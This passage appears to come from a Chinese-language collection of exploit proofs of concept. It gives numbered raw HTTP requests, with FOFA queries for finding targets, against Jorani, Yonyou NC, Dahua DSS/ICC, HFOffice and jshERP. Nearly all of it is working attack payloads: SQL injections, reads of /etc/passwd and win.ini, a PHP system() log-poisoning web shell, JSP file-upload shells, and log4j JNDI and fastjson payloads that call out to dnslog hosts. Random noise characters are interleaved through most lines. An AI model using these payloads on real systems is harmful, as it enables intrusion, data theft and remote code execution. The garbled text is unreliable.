GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
1 x1 D3 Q6 ]6 j( v: g nHost: 127.0.0.1# ]) s" ~$ h1 _ Q& M- [! W; E
Pragma: no-cache
& r# V0 c3 \$ n+ |+ c3 rCache-Control: no-cache
! E! q) D: w( f& q. |Upgrade-Insecure-Requests: 15 c4 u) Y8 R- E5 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' T7 i, f2 z! D- R7 {% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- f) {: t5 g6 [9 ?( @$ eAccept-Encoding: gzip, deflate
* n. a, P5 T# y6 rAccept-Language: zh-CN,zh;q=0.9,en;q=0.84 Z a: k0 Y3 X; b( l
Connection: close
5 r) y$ a% ]( v$ A+ @ e8 o
5 o& ]/ s2 t& p# j: m3 m G+ a A& }$ j5 N% t2 [: `, z9 |/ \
12. Jorani < 1.0.2 远程命令执行
5 n/ Y" G# I9 b8 `6 \# aFOFA:title="Jorani"
7 B* s9 e' F/ ~; E第一步先拿到cookie
) t j" m* ]! z8 R; IGET /session/login HTTP/1.1
3 K: T$ m% _& i/ U( pHost: 192.168.190.308 l$ R8 r9 i; g' v- d6 i2 ~
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
% M( a+ g+ r! a! m% H. m9 `6 NConnection: close
7 P) }6 J4 R# {3 p, q2 K* iAccept-Encoding: gzip
: J. r" B, ], M9 b, ~, Q+ ?5 c
" h& M0 u+ m. ]5 e3 s
9 K4 h3 N* m! ]响应中csrf_cookie_jorani用于后续请求
' e0 q* R5 z4 K/ v% d! F7 B. |, q/ EHTTP/1.1 200 OK/ Q& w/ E4 }6 }- p
Connection: close6 [* l2 ~9 G$ c. e2 C# E3 j( o# r5 @& O
Cache-Control: no-store, no-cache, must-revalidate7 u* f/ U. u C; _: m
Content-Type: text/html; charset=UTF-8
4 \( y" V/ {: \( }5 k* aDate: Tue, 24 Oct 2023 09:34:28 GMT6 _/ F. y! S) L6 f
Expires: Thu, 19 Nov 1981 08:52:00 GMT
) }. Q& |* k+ TLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
# H- U0 P3 ?& G9 m; yPragma: no-cache
8 I; X9 r0 H+ P/ a+ C2 NServer: Apache/2.4.54 (Debian)
9 a9 ]; y' w& M2 f5 HSet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
f3 ]* e1 P. f6 E$ U- F: E6 m pSet-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
. v; H! Q' [& w s% YVary: Accept-Encoding
$ b F8 F4 B. ?. ^5 U* O* v& I/ l8 P3 P& V
$ F/ J2 l8 Z: a9 L) ]" r
POST请求,执行函数并进行base64编码
# a& p4 ?1 w. j% NPOST /session/login HTTP/1.19 `5 P! w' h2 i _ `- a! }9 F
Host: 192.168.190.305 i3 Z! H7 B! J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36: j8 S* b8 [5 V8 v# C; h1 E
Connection: close5 J x* @- J/ b. \
Content-Length: 2529 C* [( c A* K {
Content-Type: application/x-www-form-urlencoded b" ~% p) Y9 a0 U* M
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r- ]7 u1 p6 c% V: s4 Y/ c4 \
Accept-Encoding: gzip
/ M- V; Y# B0 H5 K- M' v$ y( _) e, ?( O
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor, R2 A4 Y" P9 [
5 S/ X- H& C2 {& t2 M
; G' u, t! h& ? ^" O, P$ d; \. n0 C4 ?
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 Q# z; v* q% F1 ^! p8 h' eGET /pages/view/log-2023-10-24 HTTP/1.1
C/ v8 i& F8 t1 RHost: 192.168.190.30
6 B$ U, v% w8 WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
4 w: }2 f$ p$ O8 A& ^9 s! X2 }1 jConnection: close
+ z w/ l3 a: P5 Q+ i* b5 g" |/ ACookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r1 c: ?: b, x, f2 X" J4 K" S9 ^
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=7 e: V" C$ Z8 _4 c, v$ E, [
X-REQUESTED-WITH: XMLHttpRequest
# a ^( R' q6 H* M0 r. Z+ FAccept-Encoding: gzip
/ y8 k! o) [1 r# e
6 f8 U! }# @+ {
& c z: t2 ~: O* j: s E13. 红帆iOffice ioFileDown任意文件读取4 S- O+ C2 b* x j
FOFA:app="红帆-ioffice"' R9 a, O& s: s% W
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
$ V# M2 m" F' q) U8 V T$ P8 WHost: x.x.x.x$ M) }) I6 d" f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 ]6 P2 ]* m5 q8 i( e7 @
Connection: close( N. W% V5 G( v9 t* j. S
Accept: */*) v) H K0 |5 J( U7 |4 u
Accept-Encoding: gzip/ `2 J" X) d3 q+ d" G
1 i; [+ W D' ?/ d; t0 y- L
P8 e4 X" o- {0 s5 E7 P0 n' n14. 华夏ERP(jshERP)敏感信息泄露& m" w7 R4 W$ }( _( c& u
FOFA:body="jshERP-boot": K' a: O% n5 U- d* N+ m
泄露内容包括用户名密码
" C' x7 \' y2 q5 T8 tGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
. A9 M# B4 v, `: HHost: x.x.x.x& }4 i3 b( ]# T4 h
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 m; Y7 m; T( \: N+ \Connection: close% D" Z9 w3 N1 |! a4 |; M
Accept: */*$ w# ]. X- S3 P1 z
Accept-Language: en
- f6 T2 g, c, H( I$ [" Z S8 nAccept-Encoding: gzip
G4 M+ r0 s) J( v) a
9 v& Z- I3 W# Q D. s8 [
; k- y2 c1 _6 u1 u/ r N15. 华夏ERP getAllList信息泄露
( o6 w& `- o8 X5 e; v0 p' V7 tCVE-2024-0490$ t# c7 E+ C1 K( {; ~: c2 M) m
FOFA:body="jshERP-boot"
4 M; W0 F- y8 T8 }# S0 C泄露内容包括用户名密码; y1 Z+ Y. l1 @! H9 }/ f
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
9 ]) h" A, ^7 X: b2 ^2 _, [Host: 192.168.40.130:100
' b1 l( i0 j/ A7 RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 G ?" v3 @8 P" N0 t' c& Z6 F
Connection: close
$ b% ^5 [1 Y, J" y+ TAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
* S5 r3 _8 \9 w" s# Y% r5 m; S- RAccept-Language: en
* f& a! n: t H' D7 o. Rsec-ch-ua-platform: Windows* v" ^# k. Y/ T' n4 M# u3 y Z4 C
Accept-Encoding: gzip* g6 f: E# N# u- q9 T4 G
% M; Q ^: | A$ Q+ K! Z6 O& ?
. L5 Y3 e6 }7 M/ f8 G# e/ ?) a7 {16. 红帆HFOffice医微云SQL注入+ j5 d/ G. P9 X
FOFA:title="HFOffice"
$ b9 T/ G5 r+ |( S0 ~. f p- `# bpoc中调用函数计算1234的md5值
; y7 {! F j4 e( k9 u A, l/ NGET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
& z4 ~" B! v% ^' x h/ o1 _4 [Host: x.x.x.x4 A, m& f9 m6 I1 O1 P, I
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.368 K) y/ _3 N: B: U
Connection: close
) D% z! Y6 f* tAccept: */*
- o. }" B) s" p% P+ P. V4 e) l/ v. RAccept-Language: en% X# A" H, m5 J6 f0 O
Accept-Encoding: gzip+ G/ H1 h. o5 o# W" X, u
0 `6 k7 _+ z& A$ V9 ?: @8 u x, u3 o# T. s# Z
17. 大华 DSS itcBulletin SQL 注入
& w0 a# C4 P# y7 ^8 W$ V. kFOFA:app="dahua-DSS"9 C+ A0 V1 x4 m+ D3 \% w% g6 j7 U
POST /portal/services/itcBulletin?wsdl HTTP/1.1
* y) j3 Y1 G! d( T: YHost: x.x.x.x
* O; }2 C$ b+ l2 C+ Z. K$ \7 X- ?0 TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 f. _' y; n* y3 z; ~7 H* W
Connection: close N5 }6 T/ M3 h$ ~
Content-Length: 345
8 ~2 F2 j& T2 T9 {# ]; eAccept-Encoding: gzip4 T" W8 _+ _' s5 X; O; ]
8 k, p+ b1 p, c8 b2 B<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>% Y% ]9 P8 ~3 ]4 {- R
<s11:Body>
& Z3 y I; J; d <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
1 B o2 ^2 `2 z- O7 a; z1 V) | <netMarkings>
- m* m0 S1 D5 t( E) a; i5 V5 _: u (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" E/ } Y1 u; Y7 p k$ z& V( L </netMarkings>( t: K) B! g) J' e1 J$ @
</ns1:deleteBulletin>2 \9 ?7 d% q* ^1 y8 h9 G
</s11:Body>
7 [% X9 O4 L1 F; {6 G; d% Y1 V2 g</s11:Envelope>
# C: |7 `0 O F; z( o
/ i6 X+ n0 ^" b. G- k) z0 z4 [: R' _
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露" c% D3 [9 r& Q. M
FOFA:app="dahua-DSS"
7 o& }" I/ W$ q5 V( nGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1# ?, I. L% Y+ s6 V# B
Host: your-ip% a! W" z; }% }# h# n0 i p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: O$ I, C6 G6 ~5 T6 C
Accept-Encoding: gzip, deflate) l' L( r% K" x6 `
Accept: */*# a0 i! r. T: }- X5 k
Connection: keep-alive
2 N8 }# \9 v' I$ f
- g3 w& ]/ i& g- n& `
2 M' g$ y! q) _+ N
9 x. T; X0 N6 b8 g# j, X+ V19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入" z8 F$ z. X+ ^, _7 h2 J! |" T' ~
FOFA:app="dahua-DSS"! ]& ]- P# R( x' X
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
* M9 f) |6 z3 h$ x: O THost:
% f/ W4 M. A1 V6 N9 QUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
0 l1 h6 x7 @+ Q$ B; U1 R: EAccept-Encoding: gzip, deflate% q7 }8 }. B9 ^! j& M
Accept: */*
0 A6 F2 s, U# l( ?) MConnection: keep-alive
+ ^& f( u- h6 _1 S/ |( y+ H
[" W' o. f+ T# {2 g7 l8 T. x& D: T
7 l" W1 g% e! _. w4 D8 Q; i20. 大华ICC智能物联综合管理平台任意文件读取7 w0 r! k2 c0 o! U# V( K" Z1 \
FOFA:body="*客户端会小于800*"
. H0 C7 m, i: s% @: M0 N; qGET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
( n0 N0 g/ l& qHost: x.x.x.x
# j' ]8 |" H$ OUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" |6 o! ~6 [% yConnection: close" n* }% U) [' O* [
Accept: */*
6 P, T/ z! T! T7 `Accept-Language: en3 | C% {1 y2 X2 `5 ]+ [
Accept-Encoding: gzip
# {" u: H$ O3 ^3 F) _: I5 V5 A5 l& ^5 Y d
' L t; {0 u- k1 }- ?( V! s4 M/ m( E' o+ h
21. 大华ICC智能物联综合管理平台random远程代码执行
: F* k: h% s" l" d% tFOFA:icon_hash="-1935899595". s/ Y( [1 F, ^3 M! e `
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
e. x* ?, b" _' a; b' H& S% qHost: x.x.x.x
" m2 U+ S- V. n0 N+ F; oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; D3 N& H8 X' u9 C6 N3 e" _
Content-Length: 161
3 g: |1 m- a e9 {Accept-Encoding: gzip
& F" D1 [& h0 ]% s% MConnection: close5 w; b1 Q4 i0 H9 H, a) f; }
Content-Type: application/json;charset=utf-85 b8 i+ w Y! G
4 N, m2 G4 C: `0 `0 _{" P0 r1 J1 a5 M$ ?3 ] U+ A7 l
"a":{
% K4 n) {$ u% p "@type":"com.alibaba.fastjson.JSONObject",' Z& G9 q* E- D% ]8 f$ e( _- j8 ]
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( t1 [9 o/ p l2 q$ x }""- d( Z9 R T$ g
}$ l; a" z4 |( |% k, l
" h2 U7 U9 [/ N$ A1 E
: X+ X' K2 u' A! f
22. 大华ICC智能物联综合管理平台 log4j远程代码执行. C5 U( \, @8 `3 U
FOFA:icon_hash="-1935899595"
& y% h1 c7 s& M6 m, T& O- Z G* yPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1! a( c* p2 L5 r( ?
Host: your-ip
" q# @8 F6 S( bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; w% z. @$ `9 ]; i! H3 \ lContent-Type: application/json;charset=utf-8
9 [3 _7 F; s: n% C+ \
# e8 Q7 k W) I. c+ Y! H( _{
% c; U# V) L. ["loginName":"${jndi:ldap://dnslog}", H0 ~6 f& Z. P8 o9 F5 q. k
}: F9 f/ j% t/ U2 d& Z& [
+ U# r6 p+ \/ W2 T& U, G
$ f( I& M# l* p) C- L6 K1 a) h$ `" U y# X4 Q. J
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
* `& d; u8 U# Z B- ~( a( W& zFOFA:icon_hash="-1935899595"/ o1 d D5 r) x. q2 G
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
: \5 j! u+ J* l% P; Q" }' Q8 M9 fHost: your-ip
6 ^8 F6 c0 n. k( \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: e# P% [4 J3 l5 K1 EContent-Type: application/json;charset=utf-8
" H2 x' O3 H2 W: {" \' uAccept-Encoding: gzip% a* z% ^ u" y: o- q
Connection: close
" D& l. o/ a$ ?0 e! Q9 i% E, z f: o8 I3 s; ~
{& N: t" P$ v* @6 P8 R4 b( R' H
"a":{
6 [" ^! i) g! Y7 \; S# B8 I "@type":"com.alibaba.fastjson.JSONObject",- t; B! ~; ~; ^. i; [# I; t
{"@type":"java.net.URL","val":"http://DNSLOG"}) w. T9 l+ k: S! |0 k$ }8 J6 E
}"" `5 A# F7 t3 z) R9 w" K
}5 m. I' A7 m* v9 l, H& u
: `$ T1 e" g n! R2 f1 a) T6 R8 [0 m+ ?: k9 N+ \
24. 用友NC 6.5 accept.jsp任意文件上传& M: i* b5 Y0 Q( d
FOFA:icon_hash="1085941792". g1 @1 F9 y- v a8 V, C0 r
POST /aim/equipmap/accept.jsp HTTP/1.1
% R9 |, |. e4 D) z s& \Host: x.x.x.x
' X" M/ G& b0 ^( C$ M$ DUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
; O/ ~ Z/ V j; }! j$ N+ s( UConnection: close
9 O9 a \. X3 k( Y: a& ^. p1 `* oContent-Length: 449' ?+ @8 `+ s. r0 g9 N; O
Accept: */*
4 `& D# W# e; f% fAccept-Encoding: gzip
5 a; m6 u9 b9 d! u" w8 tContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc+ e: D' m9 L4 }' V2 c2 I- D
( P+ T, v2 q3 x+ `2 F-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- w0 o6 R$ M& E4 M& Z
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"7 C$ N9 V2 B& j2 z) Q8 K) W
Content-Type: text/plain
$ z. J: }% W2 |" @
% Z/ u6 k) F7 p: f# Y$ M<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
. Y) X) O2 w- p; W. s' M-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
; c7 l4 {$ K. d8 ^: h# f5 }5 yContent-Disposition: form-data; name="fname", X, r# \: p, W4 |. q9 `9 u) X' k
* b1 t/ G( @+ s: t2 ], T5 j\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
/ ?' N9 r5 l% u9 C-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
& I( |% X6 C5 ~/ y+ Q5 \0 ?4 _$ R5 ~. n1 t
% y: f( e7 G/ k/ R25. 用友NC registerServlet JNDI 远程代码执行# X$ k4 K$ p5 A
FOFA:app="用友-UFIDA-NC"9 N8 M1 m4 D, k% {# ^$ E, ?$ ]5 V
POST /portal/registerServlet HTTP/1.1
7 U+ ~, k1 s6 _Host: your-ip
# [& D6 Z/ u8 |# V+ x% J( hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0% P5 G9 `0 b) f" U; A k) e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
5 ~( j% z2 v# m! t f& UAccept-Encoding: gzip, deflate
* y# D9 r4 x& s& uAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.67 }! Y4 h2 d2 P. o& |
Content-Type: application/x-www-form-urlencoded; ^: e R5 X2 f+ @) L
5 {& O+ r( C+ V3 r/ Z0 M/ `5 vtype=1&dsname=ldap://dnslog
% o4 M( Z+ ^6 P' }9 Q
' Z: }! C2 V6 v/ y, ~" s. D" v% C$ B% m# T5 O& d
, `1 w9 v2 ]4 n3 j6 u' v26. 用友NC linkVoucher SQL注入( Y5 C) E. q; U1 i% t0 h4 D$ v
FOFA:app="用友-UFIDA-NC"9 q9 E0 Q+ i! X9 @
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
+ o" b) W/ k. d, G6 SHost: your-ip
2 {: X# c. U- \. d, aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 D9 N4 x; b4 i, _% G/ g
Content-Type: application/x-www-form-urlencoded
o3 `& ^5 g2 c: A: ^6 K- F9 PAccept-Encoding: gzip, deflate5 i3 F5 h- e+ x& S2 x) D8 I1 h T
Accept: */*
- w- j1 c( ^% O! v0 ^Connection: keep-alive2 L3 b# }- U7 j, H* s
: V m- s7 }1 m2 m- R' J/ ~
/ L( h6 R4 w1 F27. 用友 NC showcontent SQL注入+ p6 V) s4 A8 m. \4 k
FOFA:icon_hash="1085941792"4 W7 P3 { m" L8 X# [
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
) ~5 b1 L1 ~" C- r" v/ w r2 zHost: your-ip0 a7 V! R k# D8 p1 s5 [1 Z9 W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" g. s# k; q3 ^/ M+ y5 S X
Accept-Encoding: identity4 t! J3 C- \( G4 P# k' }8 Z: I+ k
Connection: close8 T- N: h6 \, r( D7 j
Content-Type: text/xml; charset=utf-8# {8 x9 {1 c) w8 s5 p
' z/ p4 d5 f2 ?& ?; q6 V& F5 T% V5 ~
28. 用友NC grouptemplet 任意文件上传
c: V: \1 n: W( @! UFOFA:icon_hash="1085941792"
2 F$ n h( d3 i$ R- H# t# I) `5 jPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
7 R; D# n$ f, THost: x.x.x.x& S0 B. V- ?9 c/ z0 @3 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.368 L; e* h C7 x, O7 s
Connection: close9 P' \2 e- f1 C) v2 k; |
Content-Length: 268; m h) ~/ a- t8 o* q+ B* j
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk& f1 _8 F1 ^" p+ w+ o
Accept-Encoding: gzip
* j. E) }* _. g1 |) l: F' `; S3 S2 ^' e
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk7 I. |' u& b: }' M& a+ O& @
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"- C- c9 C3 j* n9 e
Content-Type: application/octet-stream/ |. j/ z& p. l0 }- w o; n
6 a" x: O0 w; D; m0 Y: |% D<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>5 x9 X1 ]. S! L& p/ p
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--
0 ]- T" d8 D1 k" @2 V' l) p4 D# C! k1 B S5 a; N' ^" H' u0 I6 I
$ R: @9 U4 _& E# ^% q
/uapim/static/pages/nc/head.jsp
M8 H2 x& B; N! t/ ]
7 @9 R, i2 o. c' K29. 用友NC down/bill SQL注入0 `! {4 s7 m6 H; T+ @: ?" j$ h
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
S, a; L2 q6 FGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
! M' W% T; d) y' j5 _/ iHost: your-ip
" M! x- h) |8 ?6 _3 \0 A5 I8 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
* [) d7 X* |% @ H, F0 bContent-Type: application/x-www-form-urlencoded
! R' d4 i$ o. P8 f/ c; }5 [8 F" ^Accept-Encoding: gzip, deflate% G* n+ A# l: ]
Accept: */*
: I) J; J w# i2 g7 T' X( F! _$ HConnection: keep-alive5 ]# Q! \: t Q
' B) U3 U+ N0 p3 Q% k3 \3 J( n$ E5 c3 f+ c0 g" b0 Y, L
30. 用友NC importPml SQL注入2 x* H$ u9 z7 B6 f
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif", t1 E; W$ b0 }9 `1 w P2 `
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1- a5 n/ R" G" a2 c0 h3 ~
Host: your-ip
# o( K4 X. E2 U: S8 r' U$ S8 dContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
6 Z: |, _+ o" b* K" pUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
4 @9 b2 e4 e) j! A2 s6 fConnection: close% u3 {$ }, {3 D/ D6 p5 W$ @
+ U: b3 C( I4 N8 D- S$ C7 _, I ?
------WebKitFormBoundaryH970hbttBhoCyj9V
, ~4 \/ h1 O4 AContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
6 `- K1 K; q) `/ R; f( v+ QContent-Type: image/jpeg" g( S$ o, r6 Z0 A
------WebKitFormBoundaryH970hbttBhoCyj9V--8 y1 Y; h. H3 d2 e7 \+ B
* i" M# j) l2 G' }: f
& l6 o! f( V$ w; R6 p31. 用友NC runStateServlet SQL注入( p0 x* G9 [0 b7 @# |
version<=6.5
8 f6 a3 ]$ d: D( A# }. X+ aFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"* V# F. M/ G* b& N) {
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- t+ @0 D( c2 V/ CHost: host* y+ d: K& ^+ Y) i# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
! L8 j$ D0 @, d% C) D: c" XContent-Type: application/x-www-form-urlencoded
, X6 N. U2 F- g, ^# G* e# _4 ]7 t" p1 ^% j2 V6 L( p" w
) K. ?) F' c) M2 E5 t- J' Z
32. 用友NC complainbilldetail SQL注入6 _4 T( {) {6 @# s
version= NC633、NC65- n: W! v& i7 \5 m" Z
FOFA:app="用友-UFIDA-NC") R! k& a& F, q7 I1 }+ W, A
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1; E8 V/ @: o4 D: S
Host: your-ip
r: {/ ?! g$ L J5 @- r+ V, f) JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 @7 H) m: o# q5 e3 QContent-Type: application/x-www-form-urlencoded. q0 M% ~& V9 Q1 q
Accept-Encoding: gzip, deflate
* N: _9 j, g' E- h$ U. dAccept: */*
1 G+ X9 K& y( y& E; ]" cConnection: keep-alive
" p, ~: @5 p4 p2 e* y5 O
3 g1 t! F9 l' G8 M3 w' U
/ U0 Y4 i# D$ x1 D: R8 r7 M. r, M" U33. 用友NC downTax/download SQL注入
) D( k; P, o' ?2 Pversion:NC6.5FOFA:app="用友-UFIDA-NC"2 V4 S+ U7 Z7 e, ?% e% {$ U: W
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1) u- I, H3 V+ H& \3 R$ d% s" r/ L! _
Host: your-ip' n% U k, ^# T; L6 P6 E; W O9 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 b6 S3 I- o, Y* k9 I0 ~: f
Content-Type: application/x-www-form-urlencoded
$ E0 ~) f8 e4 B5 x! nAccept-Encoding: gzip, deflate
) `7 d4 }+ p* P ]Accept: */*
n, ], h7 k, q: m/ _8 YConnection: keep-alive
* W1 M- o# r. M" }6 X& N, H3 J8 \( x8 b6 n% b
% \5 s$ I+ g6 I& Z3 V
34. 用友NC warningDetailInfo接口SQL注入. S6 D- \+ ~9 }6 J! K/ f
FOFA:app="用友-UFIDA-NC"
4 W! j* E+ C) t$ ]- O6 d) UGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
2 o3 H( J4 M: T4 a& V3 RHost: your-ip
/ g7 \& E9 e/ k- v/ x$ l# ?User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 [# Y: @& @0 B4 Z8 O+ E! O% D9 f
Content-Type: application/x-www-form-urlencoded( h- [( F' |. M6 r( F6 m. I
Accept-Encoding: gzip, deflate
7 Q, P" E+ }* k( \+ z3 \Accept: */*+ R, A2 W) K$ I, b1 O/ {% y) ~
Connection: keep-alive
3 M% ~* s$ Z5 ^+ ^
- r* K8 h& A9 l7 z9 s6 U0 q3 c+ x; A$ \% R2 N* ]) s1 H
